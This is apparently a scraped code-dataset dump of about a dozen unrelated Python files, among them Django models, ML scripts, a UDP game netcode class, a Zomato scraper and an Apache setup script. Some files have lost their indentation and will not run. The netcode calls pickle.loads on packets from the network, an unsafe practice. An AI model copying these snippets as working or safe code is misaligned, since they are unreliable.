        return None

    def expires_at_timestamp(self):
        """Return the expiry as a Unix timestamp, or None if no expiry."""
        if self.expires_at is not None:
            return time.mktime(self.expires_at.timetuple())
        return None

    def ensure_expires_after(self, valid_for):
        """Extend (never shorten) the expiry to *valid_for* seconds from now."""
        expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for)
        if expires_at > self.expires_at:
            self.expires_at = expires_at
            self.save()
class invite_links(models.Model):
    """Directed relation between two invite codes.

    Exactly one of the is_* flags describes the relation kind:
    issued-by, merged-to, or temporary-for (application-scoped derivation).
    """
    code_to = models.ForeignKey(invites, related_name="invite_links_to")
    code_from = models.ForeignKey(invites, related_name="invite_links_from")
    is_issued_by = models.BooleanField(default=False)
    is_merged_to = models.BooleanField(default=False)
    is_temporary_for = models.BooleanField(default=False)
    add_time = models.DateTimeField(auto_now_add=True)
    # Session identifier of the request that created this link, if any.
    session = models.CharField(max_length=100, null=True, blank=True)

    class Meta:
        verbose_name = 'Invite link'
        verbose_name_plural = 'Invite links'

    def __unicode__(self):
        return unicode(self.code_from) + " -> " + unicode(self.code_to)
# class Usage(models.Model):
# code = models.ForeignKey(invites)
|
7,989 | e35dbcdef8779ffabc34b5e5c543e35b29523971 | #!/usr/bin/env python3
import pandas
from matplotlib import pyplot as plt
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import AdaBoostRegressor
import numpy as np
from sklearn.metrics import mean_absolute_error, mean_squared_error
from math import sqrt
def main():
    """Load 2016 quarterly CSVs as training data and 2017 quarters as test
    data, then run the 1-D decision-tree prediction."""
    train_files = ["2016Q1", "2016Q2", "2016Q3", "2016Q4"]
    test_files = ["2017Q1", "2017Q2", "2017Q3", "2017Q4"]
    # DataFrame.append was deprecated in pandas 1.4 and removed in 2.0;
    # a single pandas.concat is the supported (and faster) equivalent.
    df = pandas.concat([pandas.read_csv(f) for f in train_files])
    test = pandas.concat([pandas.read_csv(f) for f in test_files])
    #make_scatter(df)
    train_predict_1d(df, test)
    #train_predict_2d(df, test)
    return
def make_scatter(df):
    """Show a scatter plot of ride counts per start station."""
    plt.figure(figsize=(8,6))
    plt.plot(df['Start station number'], df['Counts'], 'o')
    plt.xlabel('Station')
    plt.ylabel('Counts')
    plt.show()
    return
def train_predict_1d(df, test):
    """Fit a depth-2 decision tree on station number -> counts and report RMSE.

    Trains on *df*, predicts on *test*, builds (but does not show) a plot of
    observations vs. the stepwise tree prediction, and prints the test RMSE.
    """
    regressor = DecisionTreeRegressor(max_depth=2)
    # sklearn expects a 2-D feature matrix, hence the [feature] + transpose.
    regressor.fit(np.array([df['Start station number']]).T, df['Counts'])
    xx = np.array([test['Start station number']]).T
    plt.figure(figsize=(8,6))
    plt.plot(df['Start station number'], df['Counts'], 'o', label='observation')
    plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=.7, label='prediction')
    plt.xlabel('Station')
    plt.ylabel('Counts')
    plt.legend()
    #plt.show()
    print("RMSE")
    print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))
    return
def train_predict_2d(df, test):
    """Fit a decision tree on (station, quarter) -> counts and visualize it.

    Renders the prediction surface over a 30x30 station/quarter grid as a
    heat map, then prints test MAE and RMSE.
    """
    #regressor = AdaBoostRegressor(DecisionTreeRegressor(max_depth=10), n_estimators=50, loss="square")
    regressor = DecisionTreeRegressor()
    regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])
    # Evaluation grid over the station-number and quarter ranges.
    nx = 30
    ny = 30
    x_station = np.linspace(30800,32300, nx)
    y_day = np.linspace(0, 3, ny)
    xx, yy = np.meshgrid(x_station, y_day)
    z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)
    zz = np.reshape(z_counts, (nx, ny))
    fig = plt.figure(figsize=(8, 8))
    plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)
    plt.colorbar(label='bikes predicted')
    #plt.scatter(test['Start station number'], test['Counts'], s=test['Counts']/25.0, c='g')
    plt.xlim(np.min(x_station), np.max(x_station))
    plt.ylim(np.min(y_day), np.max(y_day))
    plt.xlabel('Start station number')
    plt.ylabel('Quarter')
    #plt.show()
    #fig.savefig("2d_prediction_quarter")
    print("Mean Absolute Error")
    print(mean_absolute_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']])))
    print("RMSE")
    print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']]))))
    return
if __name__ == "__main__":
main()
|
7,990 | b883e63c70f3dfeac3294989fab93c1331b6329c | import zipfile, re
f = zipfile.ZipFile("channel.zip")
num = '90052'
comments = []
while True:
content = f.read(num + ".txt").decode("utf-8")
print(content)
comments.append(f.getinfo(num + ".txt").comment.decode("utf-8"))
match = re.search("Next nothing is (\d+)", content)
if match == None:
break
num = match.group(1)
print("".join(comments))
url = "http://www.pythonchallenge.com/pc/def/hockey.html"
print(url)
# look at the letters that make the ascii art : they are : O makes h, x makes o, g makes k, e makes e, n makes y
print("http://www.pythonchallenge.com/pc/def/oxygen.html") |
7,991 | 6e3de57f7c65e9f6195dabc3326b05744249cefe | # -*- coding: utf-8 -*-
"""Form content type."""
from briefy.plone.content.interfaces import IBriefyContent
from plone.dexterity.content import Container
from zope.interface import implementer
class IForm(IBriefyContent):
    """Marker interface for the Form content type."""


@implementer(IForm)
class Form(Container):
    """A Form: a Dexterity container content type providing IForm."""
|
7,992 | b7be9fd366d03068a5d6c3cee703d579b9866fd3 | DEFAULT_SERVER_LISTEN_PORT = 2011
DEFAULT_CLIENT_LISTEN_PORT = 2012
import pickle
import socket
from player import Player
from averageddata import *
import zlib
import g
import pygame
from collections import defaultdict
from periodic import Periodic
import random
from projectile import Projectile
TICKTIME = 0.05
class NetCommon:
netEntities = { "player": Player, "projectile":Projectile }
def __init__(self, listenPort):
#Make a UDP socket
self.sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
self.sock.bind( ("0.0.0.0", listenPort) )
self.sock.settimeout(0.01)
self.packetSize = 0
self.t = 0
self.buf = ""
self.packetTimestamps = []
self.packetsPerSecond = 0
self.simulatedLatency = 0
self.simulatedRandomLatencyVal = 0
self.simulatedPacketloss = 0
self.simulatedRandomLatency = 0
self.simulatedPackets = []
self.packet_outbound_last_id = defaultdict(lambda:0)
self.packet_inbound_last_id = defaultdict(lambda:0)
self.packetloss = defaultdict(lambda:0)
self.ensured_send_packet_ids = defaultdict(lambda:0)
self.ensured_sent_packets = defaultdict(dict)
self.ensured_recv_packet_ids = defaultdict(lambda:-1)
self.ensured_packets_received_early = defaultdict(list)
self.resend_unconfirmed_timer = 0
self.averagedData = AveragedData()
self.netinfotimer = 1.0
self.debug_lines = []
self.periodic = Periodic()
self.periodic.add(self.resendUnconfirmed, 0.5)
def readPacket(self, info, data):
self.averagedData.add(self.t, "packets")
self.averagedData.add(self.t, "packetsize", len(data))
unpacked = pickle.loads(zlib.decompress(data))
addr, port = info
addrportstr = addr + ":" + str(port)
if "ensured_id" in unpacked:
if unpacked["ensured_id"] == self.ensured_recv_packet_ids[addrportstr]+1:
print "recv " + str(unpacked["ensured_id"])
self.ensured_recv_packet_ids[addrportstr] += 1
self.sendReceipt(addr, port, unpacked["ensured_id"])
elif unpacked["ensured_id"] < self.ensured_recv_packet_ids[addrportstr]+1:
print unpacked
print "got ensured packet twice; resending receipt for " + str(unpacked["ensured_id"])
self.sendReceipt(addr, port, unpacked["ensured_id"])
return []
else:
print "got packet " + str(unpacked["ensured_id"]) + " before " + str(self.ensured_recv_packet_ids[addrportstr]+1)
self.ensured_packets_received_early[addrportstr].append(unpacked)
return []
allPackets = []
to_remove = []
self.ensured_packets_received_early[addrportstr].sort(lambda a,b:cmp(a["ensured_id"], b["ensured_id"]))
for p in self.ensured_packets_received_early[addrportstr]:
print "resolving old " + str(p["ensured_id"])
if p["ensured_id"] <= self.ensured_recv_packet_ids[addrportstr]+1:
self.ensured_recv_packet_ids[addrportstr] += 1
self.sendReceipt(addr, port, p["ensured_id"])
allPackets.extend(self.readUnpackedPacket(p, addrportstr))
to_remove.append(p)
for p in to_remove:
self.ensured_packets_received_early[addrportstr].remove(p)
allPackets.extend(self.readUnpackedPacket(unpacked, addrportstr))
return allPackets
def sendReceipt(self, addr, port, q):
self.sendPacket({"type":"confirmReceipt","other_ensured_id":q}, addr, port)
def readUnpackedPacket(self, unpacked, addrportstr):
pid = unpacked["packet_id"]
lid = self.packet_inbound_last_id[addrportstr]
if pid > lid + 1:
self.packetloss[addrportstr] += 1
self.packet_inbound_last_id[addrportstr] = pid
if self.packet_inbound_last_id[addrportstr] > 0:
packetloss = self.packetloss[addrportstr] / float(self.packet_inbound_last_id[addrportstr])
self.averagedData.add(self.t, "packetloss_" + addrportstr, packetloss)
return [unpacked]
def sendPacket(self, data, addr, port):
print "packet: " + data["type"]
addrportstr = addr + ":" + str(port)
data["packet_id"] = self.packet_outbound_last_id[addrportstr]
self.packet_outbound_last_id[addrportstr] += 1
self.sock.sendto(zlib.compress(pickle.dumps(data, 2)), (addr, port))
def sendEnsuredPacket(self, data, addr, port):
addrportstr = addr + ":" + str(port)
ensured_id = self.ensured_send_packet_ids[addrportstr]
print "packet: " + data["type"] + " (ensured id: " + str(ensured_id) + ")"
data["packet_id"] = self.packet_outbound_last_id[addrportstr]
self.packet_outbound_last_id[addrportstr] += 1
data["ensured_id"] = ensured_id
cdata = zlib.compress(pickle.dumps(data, 2))
sent = {
"id":ensured_id,
"data":cdata,
"time":self.t,
"info":(addr,port)
}
self.ensured_sent_packets[addrportstr][ensured_id] = sent
self.sock.sendto(cdata, (addr, port))
self.ensured_send_packet_ids[addrportstr] = ensured_id + 1
def process_confirmReceipt(self, data, game, info):
(addr, port) = info
addrportstr = addr + ":" + str(port)
pending_packets = self.ensured_sent_packets[addrportstr]
pid = data["other_ensured_id"]
print "got receipt for " + str(pid)
if pid in pending_packets:
del pending_packets[pid]
else:
if pid > self.ensured_send_packet_ids:
print "got receipt for packet i haven't sent yet!!"
def update(self, game, dt):
self.game = game
self.t = pygame.time.get_ticks() / 1000.0
self.periodic.update()
self.packetsPerSecond = self.averagedData.get_ct(self.t, "packets", 1.0)
self.packetSize = self.averagedData.get_sum(self.t, "packetsize", 1.0)
allPackets = []
try:
(data, info) = self.sock.recvfrom(4096)
#self.packetSize = len(data)
if self.simulatedPacketloss > 0 and random.random() < self.simulatedPacketloss:
pass
else:
allPackets = self.readPacket(info, data)
except socket.timeout:
pass
except socket.error as err:
#print err
pass
#print self.simulatedPackets
if self.simulatedLatency == 0:
for d in allPackets:
self.process(d, game, info)
else:
off = self.simulatedLatency + self.simulatedRandomLatency * random.random()
self.simulatedPackets.extend( [(d, off, info) for d in allPackets] )
thisFramePackets = [ s for s in self.simulatedPackets if s[1] <= 0]
self.simulatedPackets = [ s for s in self.simulatedPackets if s[1] > 0 ]
for (p, t, info) in thisFramePackets:
self.process(p, game, info)
self.simulatedPackets = [ (s[0], s[1] - dt, s[2]) for s in self.simulatedPackets ]
def resendUnconfirmed(self):
for k,packets in self.ensured_sent_packets.items():
for i,packet in packets.items():
if self.t > packet["time"] + 1.5:
print "resending unreceipted packet: " + str(packet["id"])
self.sock.sendto(packet["data"], packet["info"])
def process(self, data, game, info):
if(hasattr(self, "process_" + data["type"])):
f = getattr(self, "process_" + data["type"])
f(data, game, info)
else:
print("Got packet of type '" + data["type"] + "' but there is no process_" + data["type"] + " method to handle it." )
|
7,993 | c7881c0d06600a43bdc01f5e464127c596db6713 | import unittest
from datetime import datetime
from models import *
class Test_PlaceModel(unittest.TestCase):
    """
    Test the place model class
    """

    def setUp(self):
        # Fresh, saved Place instance for every test.
        self.model = Place()
        self.model.save()

    def test_var_initialization(self):
        # (attribute name, expected default value) for a brand-new Place.
        expected_defaults = [
            ("city_id", ""),
            ("user_id", ""),
            ("name", ""),
            ("description", ""),
            ("number_rooms", 0),
            ("number_bathrooms", 0),
            ("max_guest", 0),
            ("price_by_night", 0),
            ("latitude", 0.0),
            ("longitude", 0.0),
            ("amenities", ['']),
        ]
        for attr, default in expected_defaults:
            self.assertTrue(hasattr(self.model, attr))
            self.assertEqual(getattr(self.model, attr), default)
# Allow running this test module directly with `python test_place.py`.
if __name__ == "__main__":
    unittest.main()
|
7,994 | dffa5e2f34788c6f5a5ccc7d8375317a830288b5 | from microbit import *
import radio
radio.on()

# receiver will show the distance to the beacon
# the number of receivers should be easily adjustable
while True:
    message=radio.receive_full()
    # the stronger the signal the higher the number
    if message:
        # message[1] is presumably the RSSI in dBm (roughly -100 far .. -40
        # near per micro:bit radio docs — TODO confirm); +100 shifts it to a
        # non-negative range.
        strength = message[1]+100
        # Collapse to a single digit so it fits the 5x5 LED display.
        displaystrength = (int((strength/10)+1))
        display.show(str(displaystrength))
        sleep(200)
    # if beacon is too far, also usable as a sixth level of light intensity
    else:
        display.show(Image.NO)
7,995 | 96425986305171a9d23231f60b35dcbcbbd12d2d | from selenium import webdriver
import time
import xlwt
from JD_PhoneNo import get_phone_no
# Workbook that will collect the scraped restaurant data.
book = xlwt.Workbook(encoding="utf-8")
sheet1=book.add_sheet("Sheet 1")

# Drive a real Firefox instance at the Zomato Bhopal dinner listing.
browser = webdriver.Firefox()
browser.get("https://www.zomato.com/bhopal/dinner")

# Parallel result lists; index i describes the i-th restaurant scraped.
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a,b):
    """Scrape Zomato result pages a..b-1.

    For each page: click its numbered pager link, harvest restaurant
    name/address/phone from listing CSS classes and rating/cost/hours/votes
    via absolute XPaths, then click the "next" pager arrow so the following
    call to traverse() can see the next batch of page links.
    NOTE(review): indentation reconstructed from a whitespace-mangled source;
    the pager-advance click is assumed to run once per traverse() call.
    """
    temp = []
    for i in range(a,b,1):
        # NOTE(review): rebinds the parameter `a` to the current page label.
        a = str(i)
        button = browser.find_element_by_link_text(a)
        button.click()
        name_list = browser.find_elements_by_class_name("result-title.hover_feedback.zred.bold.ln24.fontsize0")
        add_list = browser.find_elements_by_class_name("col-m-16.search-result-address.grey-text.nowrap.ln22")
        phone_list = browser.find_elements_by_class_name("item.res-snippet-ph-info")
        # Walk result cards 1..17; cards 4 and 10 are skipped (presumably
        # ad/banner slots — verify against the live page layout).
        # This inner `i` shadows the page-loop `i` above.
        for i in range(1,18):
            if(i==4 or i==10 ):
                continue
            else:
                # Each field falls back to a placeholder when the card
                # lacks that element.
                try:
                    z_costoftwo.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[2]/span[2]").text)
                except Exception as e:
                    z_costoftwo.append("NILL")
                try:
                    z_hours.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[3]/div[1]").text)
                except Exception as e1:
                    z_hours.append("NILL")
                try:
                    z_votes.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span").text)
                except Exception as e1:
                    z_votes.append("NEW")
                try:
                    z_rating_list.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]").text)
                except Exception as e:
                    z_rating_list.append("NILL")
        # Append this page's harvested text to the module-level lists.
        for names in name_list:
            z_hotel_list.append(names.text)
            temp.append(names.text)
        for addname in add_list:
            z_address_list.append(addname.text)
        for phonename in phone_list:
            z_phone_list.append(phonename.get_attribute("data-phone-no-str"))
    # Advance the pager: the arrow sits at a different child index once the
    # visible page-number window has shifted past 5.
    if(int(a)<6):
        clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]")
        clk.click()
    else:
        clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]")
        clk.click()
# Walk the pager five pages at a time (pages 1-25).
traverse(1,6)
traverse(6,11)
traverse(11,16)
traverse(16,21)
traverse(21,26)
# traverse(26,31)
# traverse(31,36)
# traverse(36,41)
# traverse(41,46)
# traverse(46,51)
# traverse(51,56)
# for i in range(1,5,10):
#     traverse(i,i+5)
#     traverse(i+5,i+10)

# Dump the parallel result lists column-by-column into the sheet
# (row i = restaurant i; columns: name, phone, address, rating, cost,
# hours, votes).
for i in range(0,len(z_hotel_list),1):
    sheet1.write(i,0,z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
    sheet1.write(i,1,z_phone_list[i])
for i in range(0, len(z_address_list), 1):
    sheet1.write(i, 2, z_address_list[i])
for i in range(0,len(z_rating_list)):
    sheet1.write(i,3,z_rating_list[i])
for i in range(0, len(z_costoftwo)):
    sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
    sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
    sheet1.write(i, 6, z_votes[i])
print("Writing to excel Finished")
book.save("ZomatoBhopal(data).xls")
|
7,996 | a8e67ddbb741af6a9ff7540fef8c21468321ede0 | import argparse
import sys
import subprocess
import getpass
# Process arguments: one or more domain names, each becoming a virtual host.
parser = argparse.ArgumentParser(description='Setup a new apache virtual host on an Ubuntu system. Only tested on versions 18.04 and 20.04')
parser.add_argument('domain_name', metavar='D', type=str, nargs='+', help='domain name to give to virtual host. multiple domains can be specified at once')
args = parser.parse_args()

# Confirm action with user.
print("The following virtual host(s) will be created under their respective names.")
for arg in vars(args):
    print(getattr(args, arg))

# Port numbers, aligned with the order domains appear on the command line.
port_list = []

# Ask for a port for each domain.
print("Note: port defaults to 80")
for vh in sys.argv:
    if vh == 'create_apache_vhost.py':
        continue
    port = input("Which port should be used for " + vh + "?: ")
    if port:
        port_list.append(port)
    else:
        port_list.append("80")

# Explicit yes/no gate before touching the system.
while True:
    ans = input("Proceed? [Y/n] ")
    if ans == 'n' or ans == 'N':
        print("Exiting")
        quit()
    elif ans == 'Y' or ans == 'y':
        print("Proceeding")
        break
    else:
        print("Invalid input")

# Install apache2 if not yet installed (detected by /etc/apache2 existing).
install_sts = subprocess.call(['test', '-e', '/etc/apache2'])
if install_sts != 0:
    print("Installing Apache")
    subprocess.call(['sudo', 'apt', 'install', 'apache2'])
    # Fix: run ufw under sudo and pass the profile name without embedded
    # quotes — with shell=False the old "'Apache'" argv element was passed
    # to ufw with literal single quotes, so no profile matched.
    subprocess.call(['sudo', 'ufw', 'allow', 'Apache'])

# Get the invoking user's name (used for chown of the docroot later).
username = getpass.getuser()
# Iterate through each virtual host to be created, paired (by position)
# with the port chosen for it earlier.
index = 0
for vh in sys.argv:
    if vh == 'create_apache_vhost.py':
        continue
    print("Creating virtual host: " + vh)

    # Document root, owned by the invoking user and world-readable.
    src_path = '/var/www/html/' + vh
    subprocess.call(['sudo', 'mkdir', src_path])
    subprocess.call(['sudo', 'chown', '-R', username + ':' + username, src_path])
    subprocess.call(['sudo', 'chmod', '755', src_path])
    # Fix: the original touched src_path + 'index.html' (missing '/'),
    # creating a stray ".../<domain>index.html" file next to the docroot
    # while the open() below writes inside it.
    subprocess.call(['sudo', 'touch', src_path + '/index.html'])
    with open(src_path + '/index.html', 'a') as out:
        out.write("""<html>
    <head>
        <title>Welcome to """ + vh + """</title>
    </head>
    <body>
        <h1>""" + vh + """ virtual host is working!</h1>
    </body>
</html>""")

    # Apache site configuration for this host on its chosen port.
    conf_path = '/etc/apache2/sites-available/' + vh + '.conf'
    subprocess.call(['sudo', 'touch', conf_path])
    with open(conf_path, 'w') as out:
        out.write("""<VirtualHost *:""" + port_list[index] + """>
    ServerAdmin webmaster@localhost
    ServerName """ + vh + """
    ServerAlias www.""" + vh + """.com
    DocumentRoot /var/www/html/""" + vh + """
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>""")
    subprocess.call(['sudo', 'a2ensite', vh])
    print("\n [" + vh + "] virtual host was successfully created!")
    print(" - Source is located at " + src_path)
    print(" - Config file is located at " + conf_path + "\n")
    index += 1

# Pick up all newly enabled sites.
subprocess.call(['systemctl', 'restart', 'apache2'])
|
7,997 | 8adda42dfebd3f394a1026720465824a836c1dd1 | import random
from turtle import Turtle
colors = ["red", "blue", 'green', 'peru', 'purple', 'pink', 'chocolate', 'grey', 'cyan', 'brown']
class Food(Turtle):
    """A snake-game food pellet: a colored dot that jumps to random spots."""

    def __init__(self):
        super().__init__()
        # Configure the turtle as a small, non-drawing marker.
        self.shape("circle")
        self.penup()
        self.color("red")
        self.speed("fastest")
        # Place the first pellet somewhere on the board.
        self.refresh()

    def refresh(self):
        """Recolor the pellet and teleport it to a random board position."""
        self.color(random.choice(colors))
        new_x = random.randint(-280, 280)
        new_y = random.randint(-280, 280)
        self.goto(new_x, new_y)
|
7,998 | f275085a2e4e3efc8eb841b5322d9d71f2e43846 | from graphics.rectangle import *
from graphics.circle import *
from graphics.DGraphics.cuboid import *
from graphics.DGraphics.sphere import *
# Interactive demo: read dimensions from the user and report area/perimeter
# for each shape using the graphics package helpers.
print ("------rectangle-------")
l=int(input("enter length : "))
b=int(input("enter breadth : "))
# Fix: pass the entered length `l` — the original passed the literal 1
# (digit one mistyped for lowercase L), ignoring the user's input.
print("area of rectangle : ",RectArea(l,b))
print("perimeter of rectangle : ",Rectperimeter(l,b))
print()
print ("-------circle-------")
r=int(input("enter radius : "))
print("area of circle : ",circlearea(r))
print("perimeter of circle : ",circleperimeter(r))
print()
print ("-----cuboid-----")
l=int(input("enter length : "))
w=int(input("enter width : "))
h=int(input("enter height : "))
# Fix: same 1-vs-l typo as above for both cuboid calls.
print("area of cuboid :",cuboidarea(l,w,h))
print("perimeter of cuboid : ",cuboidperimeter(l,w,h))
print()
print ("-------shpere-----")
r=int(input("enter radius: "))
print("area of shpere: ",spherearea(r))
print("perimeter of shpere : ",sphereperimeter(r))
print()
|
7,999 | f3d34379cc7fbfe211eeebec424112f3da0ab724 | # -*- coding: utf-8 -*-
import tensorflow as tf
from yolov3 import *
from predict import predict
from load import Weight_loader
class Yolo(Yolov3):
    """YOLOv3 wrapper (TF1.x) that reuses a frozen graph when available.

    On construction it first tries to load `frozen_yolo.pb`; if that fails
    it builds the graph, loads the original weights and freezes the result
    for subsequent runs.
    """

    # One shared session for all Yolo instances (class attribute).
    sess = tf.Session()

    def __init__(self, input=None, weight_path=None, is_training=False):
        self.is_training = is_training
        try:
            # Prefer a previously frozen graph on disk.
            self.defrost()
            self.input = tf.get_default_graph().get_tensor_by_name('import/input:0')
            self.output = tf.get_default_graph().get_tensor_by_name('import/detections/output:0')
        except Exception:
            # Fix: narrowed from a bare `except:` so KeyboardInterrupt /
            # SystemExit are no longer swallowed; a missing .pb or missing
            # tensors still falls through to a fresh build.
            if not input:
                input = tf.placeholder(tf.float32, [None, 416, 416, 3], 'input')
            self.input = input
            self.input_size = self.input.get_shape().as_list()[1]
            with tf.variable_scope('detections'):
                self.output = self.graph()
            self.loader = Weight_loader(tf.global_variables('detections'), weight_path)
            # self.sess.run(tf.global_variables_initializer())
            self.sess.run(self.loader.load_now())
            self.freeze()

    def predict(self, input_list, confidence_theshold=.6, iou_threshold=.5):
        """Run the network on a batch of images and post-process detections."""
        feed_dict = {self.input: input_list}
        batch_detections = self.sess.run(self.output, feed_dict)
        return predict(batch_detections, confidence_theshold, iou_threshold)

    def freeze(self):
        """Serialize the current graph with constants baked in to frozen_yolo.pb."""
        graph_def = tf.graph_util.convert_variables_to_constants(sess=self.sess,
                                                                 input_graph_def=tf.get_default_graph().as_graph_def(),
                                                                 output_node_names=['detections/output'])
        with tf.gfile.GFile('frozen_yolo.pb', 'wb') as f:
            f.write(graph_def.SerializeToString())

    def defrost(self):
        """Import frozen_yolo.pb into the default graph (raises if absent)."""
        with tf.gfile.GFile('frozen_yolo.pb', 'rb') as f:
            graph_def = tf.GraphDef()
            graph_def.ParseFromString(f.read())
            print('Found a frozen yolov3 model, defrost and use!')
            tf.import_graph_def(graph_def)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.